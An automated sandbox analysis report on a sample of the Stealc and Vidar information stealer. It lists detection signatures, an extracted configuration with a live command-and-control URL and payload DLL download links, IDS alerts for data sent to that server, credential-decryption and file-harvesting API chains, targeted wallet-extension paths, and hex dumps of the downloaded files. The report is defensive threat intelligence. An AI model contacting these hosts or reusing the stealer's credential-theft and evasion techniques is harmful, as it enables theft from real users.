Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1538237
MD5: af7d0452fa5d881625339c18a6387da5
SHA1: 91806ce1e00019838d86d865f829977aa06fbace
SHA256: b680882b4d4010f0d63cc3f327b123006581456800d622dd54e01f577f17d8e2
Tags: exeuser-Bitsight
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.37/ URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll URL Reputation: Label: malware
Source: http://185.215.113.37 URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php3 URL Reputation: Label: malware
Found malware configuration
Source: 1.2.file.exe.af0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 1.2.file.exe.af0000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AF9B60 CryptUnprotectData,LocalAlloc,LocalFree, 1_2_00AF9B60
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AFC820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 1_2_00AFC820
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AF9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 1_2_00AF9AC0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AF7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 1_2_00AF7240
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B08EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 1_2_00B08EA0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_6CAB6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 1_2_6CAB6C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: file.exe, 00000001.00000002.2409039339.000000006CB1D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000001.00000002.2409463027.000000006CCDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source: Binary string: nss3.pdb source: file.exe, 00000001.00000002.2409463027.000000006CCDF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000001.00000002.2409039339.000000006CB1D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B04910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00B04910
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AFDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_00AFDA80
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AFE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_00AFE430
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B03EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00B03EA0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AFF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00AFF6B0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AF16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00AF16D0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AFBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 1_2_00AFBE70
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 1_2_00B038B0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AFED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 1_2_00AFED20
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B04570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 1_2_00B04570
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00AFDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00AFDE10
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49711 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.6:49711
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49711 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.6:49711
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49711 -> 185.215.113.37:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:16:07 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:16:14 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:16:15 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 19:16:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 